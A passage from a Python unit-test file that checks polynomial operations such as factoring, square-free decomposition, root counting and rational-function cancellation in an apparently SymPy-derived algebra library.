assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f = (x**2 + 2*x + 3).as_poly(modulus=5)
assert f.trunc(2) == (x**2 + 1).as_poly(modulus=5)
pytest.raises(ComputationFailed, lambda: trunc([1, 2], 2))
def test_monic():
f, g = 2*x - 1, x - Rational(1, 2)
F, G = f.as_poly(domain=QQ), g.as_poly()
assert F.monic() == G
assert monic(f) == g
assert monic(f, x) == g
assert monic(F) == G
assert monic(f, polys=True) == G
assert monic(F, polys=False) == g
pytest.raises(ComputationFailed, lambda: monic(4))
assert monic(2*x**2 + 6*x + 4, auto=False) == x**2 + 3*x + 2
pytest.raises(ExactQuotientFailed, lambda: monic(2*x + 6*x + 1, auto=False))
assert monic(2.0*x**2 + 6.0*x + 4.0) == 1.0*x**2 + 3.0*x + 2.0
assert monic(2*x**2 + 3*x + 4, modulus=5) == x**2 + 4*x + 2
assert monic(x + 2) == x + 2
assert monic(2*x + 2) == x + 1
assert monic(x - 1) == x - 1
assert monic(2*x - 1) == x - Rational(1, 2)
def test_content():
f, F = 4*x + 2, (4*x + 2).as_poly()
assert F.content() == 2
assert content(f) == 2
pytest.raises(ComputationFailed, lambda: content(4))
f = (2*x).as_poly(modulus=3)
assert f.content() == 1
def test_primitive():
f, g = 4*x + 2, 2*x + 1
F, G = f.as_poly(), g.as_poly()
assert F.primitive() == (2, G)
assert primitive(f) == (2, g)
assert primitive(f, x) == (2, g)
assert primitive(F) == (2, G)
assert primitive(f, polys=True) == (2, G)
assert primitive(F, polys=False) == (2, g)
pytest.raises(ComputationFailed, lambda: primitive(4))
f = (2*x).as_poly(modulus=3)
g = (2.0*x).as_poly(domain=RR)
assert f.primitive() == (1, f)
assert g.primitive() == (1.0, g)
assert primitive(-3*x/4 + y + Rational(11, 8)) == \
(Rational(-1, 8), 6*x - 8*y - 11)
assert primitive(3*x + 2) == (1, 3*x + 2)
assert primitive(4*x + 2) == (2, 2*x + 1)
assert primitive(2*x**2 + 6*x + 12) == (2, x**2 + 3*x + 6)
assert primitive(x**2 + 3*x + 6) == (1, x**2 + 3*x + 6)
def test_compose():
f = x**12 + 20*x**10 + 150*x**8 + 500*x**6 + 625*x**4 - 2*x**3 - 10*x + 9
g = x**4 - 2*x + 9
h = x**3 + 5*x
F, G, H = map(Poly, (f, g, h))
assert G.compose(H) == F
assert compose(g, h) == f
assert compose(g, h, x) == f
assert compose(G, H) == F
assert compose(g, h, polys=True) == F
assert compose(G, H, polys=False) == f
assert F.decompose() == [G, H]
assert decompose(f) == [g, h]
assert decompose(f, x) == [g, h]
assert decompose(F) == [G, H]
assert decompose(f, polys=True) == [G, H]
assert decompose(F, polys=False) == [g, h]
pytest.raises(ComputationFailed, lambda: compose(4, 2))
pytest.raises(ComputationFailed, lambda: decompose(4))
assert compose(x**2 - y**2, x - y, x, y) == x**2 - 2*x*y
assert compose(x**2 - y**2, x - y, y, x) == -y**2 + 2*x*y
def test_shift():
assert (x**2 - 2*x + 1).as_poly().shift(2) == (x**2 + 2*x + 1).as_poly()
def test_sqf_norm():
assert sqf_norm(x**2 - 2, extension=sqrt(3)) == \
(1, x**2 - 2*sqrt(3)*x + 1, x**4 - 10*x**2 + 1)
assert sqf_norm(x**2 - 3, extension=sqrt(2)) == \
(1, x**2 - 2*sqrt(2)*x - 1, x**4 - 10*x**2 + 1)
assert sqf_norm(x**2 - 3, extension=sqrt(2), polys=True) == \
(1, (x**2 - 2*sqrt(2)*x - 1).as_poly(extension=sqrt(2)),
(x**4 - 10*x**2 + 1).as_poly())
pytest.raises(ComputationFailed, lambda: sqf_norm([1, 2]))
assert (x**2 - 2).as_poly(extension=sqrt(3)).sqf_norm() == \
(1, (x**2 - 2*sqrt(3)*x + 1).as_poly(x, extension=sqrt(3)),
(x**4 - 10*x**2 + 1).as_poly(x, domain=QQ))
assert (x**2 - 3).as_poly(extension=sqrt(2)).sqf_norm() == \
(1, (x**2 - 2*sqrt(2)*x - 1).as_poly(x, extension=sqrt(2)),
(x**4 - 10*x**2 + 1).as_poly(x, domain=QQ))
def test_sqf():
f = x**5 - x**3 - x**2 + 1
g = x**3 + 2*x**2 + 2*x + 1
h = x - 1
p = x**4 + x**3 - x - 1
F, G, H, P = map(Poly, (f, g, h, p))
assert F.sqf_part() == P
assert sqf_part(f) == p
assert sqf_part(f, x) == p
assert sqf_part(F) == P
assert sqf_part(f, polys=True) == P
assert sqf_part(F, polys=False) == p
assert F.sqf_list() == (1, [(G, 1), (H, 2)])
assert sqf_list(f) == (1, [(g, 1), (h, 2)])
assert sqf_list(f, x) == (1, [(g, 1), (h, 2)])
assert sqf_list(F) == (1, [(G, 1), (H, 2)])
assert sqf_list(f, polys=True) == (1, [(G, 1), (H, 2)])
assert sqf_list(F, polys=False) == (1, [(g, 1), (h, 2)])
pytest.raises(PolynomialError, lambda: sqf_list([1, 2]))
pytest.raises(ComputationFailed, lambda: sqf_part(4))
assert sqf(1) == 1
assert sqf_list(1) == (1, [])
assert sqf((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert sqf(f) == g*h**2
assert sqf(f, x) == g*h**2
d = x**2 + y**2
assert sqf(f/d) == (g*h**2)/d
assert sqf(f/d, x) == (g*h**2)/d
assert sqf(x - 1) == x - 1
assert sqf(-x - 1) == -x - 1
assert sqf(x - 1) == x - 1
assert sqf(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert sqf((6*x - 10)/(3*x - 6)) == Rational(2, 3)*((3*x - 5)/(x - 2))
assert sqf((x**2 - 2*x + 1).as_poly()) == (x - 1)**2
f = 3 + x - x*(1 + x) + x**2
assert sqf(f) == 3
f = (x**2 + 2*x + 1)**20000000000
assert sqf(f) == (x + 1)**40000000000
assert sqf_list(f) == (1, [(x + 1, 40000000000)])
pytest.raises(PolynomialError, lambda: sqf_list(x/(x**2 - 1), frac=False))
assert sqf_list(x/(x**2 - 1), frac=True) == (1, [(x, 1)], [(x**2 - 1, 1)])
def test_factor():
f = x**5 - x**3 - x**2 + 1
u = x + 1
v = x - 1
w = x**2 + x + 1
F, U, V, W = map(Poly, (f, u, v, w))
assert F.factor_list() == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(f, x) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(F) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f, polys=True) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(F, polys=False) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(1) == (1, [])
assert factor_list(6) == (6, [])
assert factor_list(sqrt(3), x) == (1, [(3, Rational(1, 2))])
assert factor_list((-1)**x, x) == (1, [(-1, x)])
assert factor_list((2*x)**y, x) == (1, [(2, y), (x, y)])
assert factor_list(sqrt(x*y), x) == (1, [(x*y, Rational(1, 2))])
# issue sympy/sympy#11198
assert factor_list(sqrt(2)*x) == (1, [(2, Rational(1, 2)), (x, 1)])
assert factor_list(sqrt(2)*sin(x), sin(x)) == (1, [(2, 1/2), (sin(x), 1)])
assert factor(6) == 6 and factor(6).is_Integer
assert factor_list(3*x) == (3, [(x, 1)])
assert factor_list(3*x**2) == (3, [(x, 2)])
assert factor(3*x) == 3*x
assert factor(3*x**2) == 3*x**2
assert factor((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert factor(f) == u*v**2*w
assert factor(f, x) == u*v**2*w
g, p, q, r = x**2 - y**2, x - y, x + y, x**2 + 1
assert factor(f/g) == (u*v**2*w)/(p*q)
assert factor(f/g, x) == (u*v**2*w)/(p*q)
p = Symbol('p', positive=True)
i = Symbol('i', integer=True)
r = Symbol('r', extended_real=True)
assert factor(sqrt(x*y)).is_Pow is True
assert factor(sqrt(3*x**2 - 3)) == sqrt(3)*sqrt((x - 1)*(x + 1))
assert factor(sqrt(3*x**2 + 3)) == sqrt(3)*sqrt(x**2 + 1)
assert factor((y*x**2 - y)**i) == y**i*(x - 1)**i*(x + 1)**i
assert factor((y*x**2 + y)**i) == y**i*(x**2 + 1)**i
assert factor((y*x**2 - y)**t) == (y*(x - 1)*(x + 1))**t
assert factor((y*x**2 + y)**t) == (y*(x**2 + 1))**t
f = sqrt(expand((r**2 + 1)*(p + 1)*(p - 1)*(p - 2)**3))
g = sqrt((p - 2)**3*(p - 1))*sqrt(p + 1)*sqrt(r**2 + 1)
assert factor(f) == g
assert factor(g) == g
g = (x - 1)**5*(r**2 + 1)
f = sqrt(expand(g))
assert factor(f) == sqrt(g)
f = (sin(1)*x + 1).as_poly(x, domain=EX)
assert f.factor_list() == (1, [(f, 1)])
f = x**4 + 1
assert factor(f) == f
assert factor(f, extension=I) == (x**2 - I)*(x**2 + I)
assert factor(f, gaussian=True) == (x**2 - I)*(x**2 + I)
assert factor(
f, extension=sqrt(2)) == (x**2 + sqrt(2)*x + 1)*(x**2 - sqrt(2)*x + 1)
f = x**2 + 2*sqrt(2)*x + 2
assert factor(f, extension=sqrt(2)) == (x + sqrt(2))**2
assert factor(f**3, extension=sqrt(2)) == (x + sqrt(2))**6
assert factor(x**2 - 2*y**2, extension=sqrt(2)) == \
(x + sqrt(2)*y)*(x - sqrt(2)*y)
assert factor(2*x**2 - 4*y**2, extension=sqrt(2)) == \
2*((x + sqrt(2)*y)*(x - sqrt(2)*y))
assert factor(x - 1) == x - 1
assert factor(-x - 1) == -x - 1
assert factor(x - 1) == x - 1
assert factor(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert factor(x**11 + x + 1, modulus=65537) == \
(x**2 + x + 1)*(x**9 + 65536*x**8 + x**6 + 65536*x**5 +
x**3 + 65536*x**2 + 1)
assert (factor(x**3 + 3*x + 2, modulus=4) ==
factor((x**3 + 3*x + 2).as_poly(modulus=4)) ==
(x + 1)*(x**2 + x + 2))
assert (factor_list((x**3 + 3*x + 2).as_poly(modulus=4)) ==
(1, [((x + 1).as_poly(modulus=4), 1),
((x**2 + x + 2).as_poly(modulus=4), 1)]))
f = x/pi + x*sin(x)/pi
g = y/(pi**2 + 2*pi + 1) + y*sin(x)/(pi**2 + 2*pi + 1)
assert factor(f) == x*(sin(x) + 1)/pi
assert factor(g) == y*(sin(x) + 1)/(pi + 1)**2
assert factor(Eq(
x**2 + 2*x + 1, x**3 + 1)) == Eq((x + 1)**2, (x + 1)*(x**2 - x + 1))
f = (x**2 - 1)/(x**2 + 4*x + 4)
assert factor(f) == (x + 1)*(x - 1)/(x + 2)**2
assert factor(f, x) == (x + 1)*(x - 1)/(x + 2)**2
f = 3 + x - x*(1 + x) + x**2
assert factor(f) == 3
assert factor(f, x) == 3
assert factor(1/(x**2 + 2*x + 1/x) - 1) == -((1 - x + 2*x**2 +
x**3)/(1 + 2*x**2 + x**3))
assert factor(f, expand=False) == f
pytest.raises(PolynomialError, lambda: factor(f, x, expand=False))
pytest.raises(FlagError, lambda: factor(x**2 - 1, polys=True))
assert factor([x, Eq(x**2 - y**2, Tuple(x**2 - z**2, 1/x + 1/y))]) == \
[x, Eq((x - y)*(x + y), Tuple((x - z)*(x + z), (x + y)/x/y))]
assert not isinstance(
(x**3 + x + 1).as_poly().factor_list()[1][0][0], PurePoly) is True
assert isinstance(
PurePoly(x**3 + x + 1).factor_list()[1][0][0], PurePoly) is True
assert factor(sqrt(-x)) == sqrt(-x)
# issue sympy/sympy#5917
e = (-2*x*(-x + 1)*(x - 1)*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)*(x**2*(x -
1) - x*(x - 1) - x) - (-2*x**2*(x - 1)**2 - x*(-x + 1)*(-x*(-x + 1) +
x*(x - 1)))*(x**2*(x - 1)**4 - x*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)))
assert factor(e) == 0
# deep option
assert factor(sin(x**2 + x) + x, deep=True) == sin(x*(x + 1)) + x
assert factor(sqrt(x**2)) == sqrt(x**2)
# issue sympy/sympy#7902
assert (2*Sum(3*x, (x, 1, 9))).factor() == 6*Sum(x, (x, 1, 9))
assert (2*Sum(x**2, (x, 1, 9))).factor() == 2*Sum(x**2, (x, 1, 9))
A, B = symbols('A B', commutative=False)
f = (x - A)*(y - B)
assert factor(f.expand()) == f
assert factor(Sum(4*x, (x, 1, y))) == 4*Sum(x, (x, 1, y))
# issue sympy/sympy#13149
assert (factor(expand((0.5*x + 1)*(0.5*y + 1))) ==
Mul(4.0, 0.25*x + 0.5, 0.25*y + 0.5))
assert factor(expand((0.5*x + 1)**2)) == 4.0*(0.25*x + 0.5)**2
assert factor(x**4/2 + 5*x**3/12 - x**2/3) == x**2*(2*x - 1)*(3*x + 4)/12
assert factor(x**6 - 4*x**4 + 4*x**3 - x**2) == x**2*(x - 1)**2*(x**2 + 2*x - 1)
# issue sympy/sympy#9607
assert factor(1e-20*x - 7.292115e-5) == 1e-20*x - 7.292115e-5
def test_factor_large():
f = (x**2 + 4*x + 4)**10000000*(x**2 + 1)*(x**2 + 2*x + 1)**1234567
g = ((x**2 + 2*x + 1)**3000*y**2 + (x**2 + 2*x + 1)**3000*2*y +
(x**2 + 2*x + 1)**3000)
assert factor(f) == (x + 2)**20000000*(x**2 + 1)*(x + 1)**2469134
assert factor(g) == (x + 1)**6000*(y + 1)**2
assert factor_list(f) == (1, [(x**2 + 1, 1), (x + 1, 2469134),
(x + 2, 20000000)])
assert factor_list(g) == (1, [(y + 1, 2), (x + 1, 6000)])
f = (x**2 - y**2)**200000*(x**7 + 1)
g = (x**2 + y**2)**200000*(x**7 + 1)
assert factor(f) == \
(x + 1)*(x - y)**200000*(x + y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor(g, gaussian=True) == \
(x + 1)*(x - I*y)**200000*(x + I*y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor_list(f) == \
(1, [(x + 1, 1), (x - y, 200000), (x + y, 200000), (x**6 -
x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
assert factor_list(g, gaussian=True) == \
(1, [(x + 1, 1), (x - I*y, 200000), (x + I*y, 200000), (
x**6 - x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
def test_factor_noeval():
assert factor(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert factor((6*x - 10)/(3*x - 6)) == Rational(2, 3)*((3*x - 5)/(x - 2))
def test_count_roots():
assert count_roots(x**2 - 2) == 2
assert count_roots(x**2 - 2, inf=-oo) == 2
assert count_roots(x**2 - 2, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-oo, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-2) == 2
assert count_roots(x**2 - 2, inf=-1) == 1
assert count_roots(x**2 - 2, sup=1) == 1
assert count_roots(x**2 - 2, sup=2) == 2
assert count_roots(x**2 - 2, inf=-1, sup=1) == 0
assert count_roots(x**2 - 2, inf=-2, sup=2) == 2
assert count_roots(x**2 - 2, inf=-1, sup=1) == 0
assert count_roots(x**2 - 2, inf=-2, sup=2) == 2
assert count_roots(x**2 + 2) == 0
assert count_roots(x**2 + 2, inf=-2*I) == 2
assert count_roots(x**2 + 2, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=-2*I, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=0) == 0
assert count_roots(x**2 + 2, sup=0) == 0
assert count_roots(x**2 + 2, inf=-I) == 1
assert count_roots(x**2 + 2, sup=+I) == 1
assert count_roots(x**2 + 2, inf=+I/2, sup=+I) == 0
assert count_roots(x**2 + 2, inf=-I, sup=-I/2) == 0
assert count_roots(x**2 + 1, inf=-I, sup=1) == 1
assert count_roots(x**4 - 4, inf=0, sup=1 + 3*I) == 1
pytest.raises(PolynomialError, lambda: count_roots(1))
def test_sympyissue_12602():
expr = 11355363812949950368319856364342755712460471081301053527133568171268803160551855579764764406412332136789657466300880824616465555590045220022768132246969281371700283178427904690172215428157788636395727*t**14/500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 1182614101238502509994197939548011046110362591360244720959032955996959698293886871005468894084128139099293801809189908060595593758885614886473934547400040763077455747185622083724725964710198605960741*t**13/6250000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 12922822504467751142249299122933324184092020356108036157731097049497758652003692943810675925067800052327142015387959211427374009396705154181837176763552511140169473943304565171121276347837419884681487*t**12/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 2247204646780185719430022273864876084706708953097666720876560045907791931848809022047384483255204086759310635258105261945382035979316693256857004274231432751741774866992749719943120236265693542959121*t**11/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 48361843519832766388699493325560944345496391872452676523436328806727211606456243561884964568166128629309073817110912281835520854136140406763166099011063597874739148993632932049857510934073377073756943*t**10/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 80164052804759260531194459240730834126540153423610579212661871973340813173703351959915044156338949310408408075892534630817446213642840221172696829016781427774802300251456296296549939454943896121381103*t**9/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 11820298688854366697091577677719451524251323356734720588058286064886307168520540386661816641085576247246659191024148765432674755172844550760156289246049795015707597236348994207857339854655564489007679*t**8/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 14908242237501135776503697900202844008307102016637953004464689811953233096672981556176039254271036473296837438230462049062156575391853236190707958824171141585643979204278060814079164562347710212783143*t**7/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 4004804534801340363315980630036975745885352263060800540982728634021250371208042415913703863593076428445232409745085269553713246947392078483528154594010983406996758112107177357774230732091992176355051*t**6/25000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 14405532019175131023474809758591882760843355517617477976264800133366074549575009123545658907344444270748700666056555232135755778765629022007752913521423634118196613981546114590366304386999628027814879*t**5/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 10574051936471402714931747549059296527795248964344182731742838740900131997560377847217760142735497446739729085272580576056569967115897852649538335744262984346103108139783500273358254849041434565692381*t**4/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 7621024600438344015600198602526834713218087596509021419939455089811715884880919464619193508300267251654333701818067555976498078593210932512841643006106774171602557804624587725019604901643333157908251*t**3/125000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 810596792271328855063337004546095119237768466927680286629788036582515398849767422695474356109018097281604030779219064519000249092915587584571381512608327847454533913096943271752401133736953700148513*t**2/3125000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 7250440010579498280072969338541700246700434564503594127678121996192953098480655821398616200867454166215020508242889954318334847876038061179796990134727332078272146610064625333734530143125317393151907*t/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 1
assert count_roots(expr) == 0
def test_Poly_root():
f = (2*x**3 - 7*x**2 + 4*x + 4).as_poly()
assert f.root(0) == -Rational(1, 2)
assert f.root(1) == 2
assert f.root(2) == 2
pytest.raises(IndexError, lambda: f.root(3))
assert (x**5 + x + 1).as_poly().root(0) == RootOf(x**3 - x**2 + 1, 0)
def test_real_roots():
assert real_roots(x) == [0]
assert real_roots(x, multiple=False) == [(0, 1)]
assert real_roots(x**3) == [0, 0, 0]
assert real_roots(x**3, multiple=False) == [(0, 3)]
assert real_roots(x*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0]
assert real_roots(x*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 1)]
assert real_roots(
x**3*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0, 0, 0]
assert real_roots(x**3*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 3)]
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert f.as_poly().real_roots() == [-Rational(1, 2), 2, 2]
assert g.as_poly().real_roots() == [RootOf(g, 0)]
pytest.raises(PolynomialError, lambda: real_roots(1))
def test_all_roots():
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert f.as_poly().all_roots() == [-Rational(1, 2), 2, 2]
assert f.as_poly().all_roots(multiple=False) == [(-Rational(1, 2), 1), (2, 2)]
assert g.as_poly().all_roots() == [RootOf(g, 0), RootOf(g, 1), RootOf(g, 2)]
f = (x**7 - x).as_poly(modulus=7)
# issue sympy/sympy#22673
assert f.all_roots() == [RootOf(f, i, evaluate=False) for i in range(7)]
def test_nroots():
assert not Integer(0).as_poly(x).nroots()
assert not Integer(1).as_poly(x).nroots()
assert (x**2 - 1).as_poly().nroots() == [-1.0, 1.0]
assert (x**2 + 1).as_poly().nroots() == [-1.0*I, 1.0*I]
roots = (x**2 - 1).as_poly().nroots()
assert roots == [-1.0, 1.0]
roots = (x**2 + 1).as_poly().nroots()
assert roots == [-1.0*I, 1.0*I]
roots = (x**2/3 - Rational(1, 3)).as_poly().nroots()
assert roots == [-1.0, 1.0]
roots = (x**2/3 + Rational(1, 3)).as_poly().nroots()
assert roots == [-1.0*I, 1.0*I]
assert (x**2 + 2*I).as_poly(x).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert (
x**2 + 2*I).as_poly(x, extension=I).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert (0.2*x + 0.1).as_poly().nroots() == [-0.5]
roots = nroots(x**5 + x + 1, n=5)
eps = Float('1e-5')
assert re(roots[0]).epsilon_eq(-0.75487, eps) is true
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is true
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is true
assert re(roots[3]).epsilon_eq(+0.87743, eps) is true
assert im(roots[3]).epsilon_eq(-0.74486, eps) is true
assert re(roots[4]).epsilon_eq(+0.87743, eps) is true
assert im(roots[4]).epsilon_eq(+0.74486, eps) is true
eps = Float('1e-6')
assert re(roots[0]).epsilon_eq(-0.75487, eps) is false
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is false
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is false
assert re(roots[3]).epsilon_eq(+0.87743, eps) is false
assert im(roots[3]).epsilon_eq(-0.74486, eps) is false
assert re(roots[4]).epsilon_eq(+0.87743, eps) is false
assert im(roots[4]).epsilon_eq(+0.74486, eps) is false
pytest.raises(DomainError, lambda: (x + y).as_poly(x).nroots())
pytest.raises(MultivariatePolynomialError, lambda: (x + y).as_poly().nroots())
assert nroots(x**2 - 1) == [-1.0, 1.0]
roots = nroots(x**2 - 1)
assert roots == [-1.0, 1.0]
assert nroots(x + I) == [-1.0*I]
assert nroots(x + 2*I) == [-2.0*I]
pytest.raises(PolynomialError, lambda: nroots(0))
# issue sympy/sympy#8296
f = (x**4 - 1).as_poly()
assert f.nroots(2) == [w.evalf(2) for w in f.all_roots()]
def test_cancel():
assert cancel(0) == 0
assert cancel(7) == 7
assert cancel(x) == x
assert cancel(oo) == oo
assert cancel((2, 3)) == (1, 2, 3)
assert cancel((0, 1, 2)) == (0, 1, 2)
assert cancel((1, 0), x) == (1, 1, 0)
assert cancel((0, 1), x) == (1, 0, 1)
f, g, p, q = 4*x**2 - 4, 2*x - 2, 2*x + 2, Integer(1)
F, G, P, Q = [u.as_poly(x) for u in (f, g, p, q)]
assert F.cancel(G) == (1, P, Q)
assert cancel((f, g)) == (1, p, q)
assert cancel((f, g), x) == (1, p, q)
assert cancel((F, G)) == (1, P, Q)
assert cancel((f, g), polys=True) == (1, P, Q)
assert cancel((F, G), polys=False) == (1, p, q)
f = (x**2 - 2)/(x + sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x - sqrt(2)
f = (x**2 - 2)/(x - sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x + sqrt(2)
assert cancel((x**2/4 - 1, x/2 - 1)) == (Rational(1, 2), x + 2, 1)
assert cancel((x**2 - y)/(x - y)) == 1/(x - y)*(x**2 - y)
assert cancel((x**2 - y**2)/(x - y), x) == x + y
assert cancel((x**2 - y**2)/(x - y), y) == x + y
assert cancel((x**2 - y**2)/(x - y)) == x + y
assert cancel((x**3 - 1)/(x**2 - 1)) == (x**2 + x + 1)/(x + 1)
assert cancel((x**3/2 - Rational(1, 2))/(x**2 - 1)) == (x**2 + x + 1)/(2*x + 2)
assert cancel((exp(2*x) + 2*exp(x) + 1)/(exp(x) + 1)) == exp(x) + 1
f = (x**2 - a**2).as_poly(x)
g = (x - a).as_poly(x)
F = (x + a).as_poly(x)
G = Integer(1).as_poly(x)
assert cancel((f, g)) == (1, F, G)
f = x**3 + (sqrt(2) - 2)*x**2 - (2*sqrt(2) + 3)*x - 3*sqrt(2)
g = x**2 - 2
assert cancel((f, g), extension=True) == (1, x**2 - 2*x - 3, x - sqrt(2))
f = (-2*x + 3).as_poly()
g = (-x**9 + x**8 + x**6 - x**5 + 2*x**2 - 3*x + 1).as_poly()
assert cancel((f, g)) == (1, -f, -g)
Zx = ZZ.inject(x)
Zxf = Zx.field
f = y.as_poly(y, domain=Zxf)
g = Integer(1).as_poly(y, domain=Zx)
assert f.cancel(
g) == (1, y.as_poly(y, domain=Zxf), Integer(1).as_poly(y, domain=Zxf))
assert f.cancel(g, include=True) == (
y.as_poly(y, domain=Zxf), Integer(1).as_poly(y, domain=Zxf))
f = (5*x*y + x).as_poly(y, domain=Zxf)
g = (2*x**2*y).as_poly(y, domain=Zxf)
assert f.cancel(g, include=True) == (
(5*y + 1).as_poly(y, domain=Zxf), (2*x*y).as_poly(y, domain=Zxf))
f = -(-2*x - 4*y + 0.005*(z - y)**2)/((z - y)*(-z + y + 2))
assert cancel(f).is_Mul
P = tanh(x - 3.0)
Q = tanh(x + 3.0)
f = ((-2*P**2 + 2)*(-P**2 + 1)*Q**2/2 + (-2*P**2 + 2)*(-2*Q**2 + 2)*P*Q - (-2*P**2 + 2)*P**2*Q**2 + (-2*Q**2 + 2)*(-Q**2 + 1)*P**2/2 - (-2*Q**2 + 2)*P**2*Q**2)/(2*sqrt(P**2*Q**2 + 0.0001)) \
+ (-(-2*P**2 + 2)*P*Q**2/2 - (-2*Q**2 + 2)*P**2*Q/2)*((-2*P**2 + 2)*P*Q**2/2 + (-2*Q**2 + 2)*P**2*Q/2)/(2*(P**2*Q**2 + 0.0001)**Rational(3, 2))
assert cancel(f).is_Mul
# issue sympy/sympy#7022
A = Symbol('A', commutative=False)
p1 = Piecewise((A*(x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p2 = Piecewise((A*(x - 1), x > 1), (1/x, True))
assert cancel(p1) == p2
assert cancel(2*p1) == 2*p2
assert cancel(1 + p1) == 1 + p2
assert cancel((x**2 - 1)/(x + 1)*p1) == (x - 1)*p2
assert cancel((x**2 - 1)/(x + 1) + p1) == (x - 1) + p2
p3 = Piecewise(((x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p4 = Piecewise(((x - 1), x > 1), (1/x, True))
assert cancel(p3) == p4
assert cancel(2*p3) == 2*p4
assert cancel(1 + p3) == 1 + p4
assert cancel((x**2 - 1)/(x + 1)*p3) == (x - 1)*p4
assert cancel((x**2 - 1)/(x + 1) + p3) == (x - 1) + p4
# issue sympy/sympy#9363
M = MatrixSymbol('M', 5, 5)
assert cancel(M[0, 0] + 7) == M[0, 0] + 7
expr = (z*sin(M[1, 4] + M[2, 1] * 5 * M[4, 0]) - 5 * M[1, 2])/z
assert cancel(expr) == expr
assert cancel(((x - 1)**2/(x - 1), (x + 2*x**2)/x,
(x - x**3)/x)) == (x - 1, 2*x + 1, -x**2 + 1)
# issue sympy/sympy#12531
e = (x**4/24 - x*(x**3/24 + Rational(7, 8)) +
13*x/12)/((x**3/24 + Rational(7, 8))*(-x**4/6 - x/3) +
(x**3/6 - Rational(1, 2))*(x**4/24 + 13*x/12))
assert cancel(e) == Rational(-1, 4)
def test_reduced():
f = 2*x**4 + y**2 - x**2 + y**3
G = [x**3 - x, y**3 - y]
Q = [2*x, 1]
r = x**2 + y**2 + y
assert reduced(f, G) == (Q, r)
assert reduced(f, G, x, y) == (Q, r)
H = groebner(G)
assert H.reduce(f) == (Q, r)
Q = [(2*x).as_poly(x, y), Integer(1).as_poly(x, y)]
r = (x**2 + y**2 + y).as_poly()
assert reduced(f, G, polys=True) == (Q, r)
assert reduced(f, G, x, y, polys=True) == (Q, r)
H = groebner(G, polys=True)
assert H.reduce(f) == (Q, r)
f = 2*x**3 + y**3 + 3*y
